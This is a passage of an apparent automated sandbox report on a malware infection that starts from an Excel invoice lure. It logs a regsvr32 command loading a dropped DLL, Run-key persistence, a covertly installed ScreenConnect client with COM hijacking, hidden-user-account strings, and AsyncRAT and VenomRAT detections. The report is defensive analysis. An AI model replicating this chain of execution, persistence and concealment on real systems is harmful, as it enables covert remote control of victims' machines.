                            Source: msvcp290.dll.8.drStatic PE information: section name: .managed
                            Source: msvcp290.dll.8.drStatic PE information: section name: _RDATA
                            Source: newpoveno.exe.8.drStatic PE information: section name: .xdata
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s "C:\Users\user\AppData\Local\Temp\invoice_temp\vcruntime210.dll"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9C021D2A5 pushad ; iretd 10_2_00007FF9C021D2A6
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 24_2_01811270 push edi; ret 24_2_01811282

                            Persistence and Installation Behavior

                            barindex
                            Possible COM Object hijacking
                            Source: c:\program files (x86)\screenconnect client (ea32d473b92f819d)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-9c4f-a6d669f2633d}\inprocserver32
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeFile created: C:\Users\user\SystemRootDoc\msvcp290.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeFile created: C:\Users\user\SystemRootDoc\libcares-2.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile created: C:\Users\user\AppData\Local\Temp\Document.exeJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Client.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Core.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsClient.exeJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC5F8.tmpJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICABB.tmpJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeJump to dropped file
                            Source: C:\Program Files\7-Zip\7z.exeFile created: C:\Users\user\AppData\Local\Temp\invoice_temp\libcares-2.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Windows.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.Core.dllJump to dropped file
                            Source: C:\Program Files\7-Zip\7z.exeFile created: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeFile created: C:\Users\user\SystemRootDoc\newpoveno.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmpJump to dropped file
                            Source: C:\Program Files\7-Zip\7z.exeFile created: C:\Users\user\AppData\Local\Temp\invoice_temp\msvcp290.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIBE65.tmp-\ScreenConnect.Windows.dllJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSICABB.tmpJump to dropped file
                            Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIC5F8.tmpJump to dropped file

                            Boot Survival

                            barindex
                            Yara detected AsyncRAT
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.newpoveno.exe.24b5482b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 22.2.newpoveno.exe.143e7c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.2.newpoveno.exe.1b2b2c2b0a0.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000018.00000002.1404363596.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457296209.0000024B54800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001B.00000002.1457520059.0000028BF6771000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377288428.00000143E7C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000016.00000002.1377470156.00000184897D1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260747029.000001F356151000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.1260524140.000001B2B2C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 5140, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7468, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: newpoveno.exe PID: 7724, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED
                            Yara detected VenomRAT
                            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 7548, type: MEMORYSTR
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                            Source: C:\Program Files (x86)\ScreenConnect Client (ea32d473b92f819d)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ea32d473b92f819d)
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newpovenoJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\invoice_temp\newpoveno.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newpovenoJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Contains functionality to hide user accounts
                            Source: Document.exe, 00000025.00000002.4296285656.00000000055D0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: Document.exe, 00000025.00000000.4208849320.0000000000756000.00000002.00000001.01000000.00000011.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: rundll32.exe, 00000029.00000003.4239690523.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: ScreenConnect.ClientService.exe, 0000002D.00000002.6333087252.0000000001E72000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6375014970.000000001BCF2000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6329378162.0000000002E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                            Source: ScreenConnect.WindowsClient.exe, 0000002E.00000002.6327680600.0000000002CD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\58CF1D3677C703D52430 BEA19E2DECE602CED1D3DF8C825A993F3D412C2A4D4D87EAA39F44BA4FB39E82
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess information set: NOOPENFILEERRORBOX
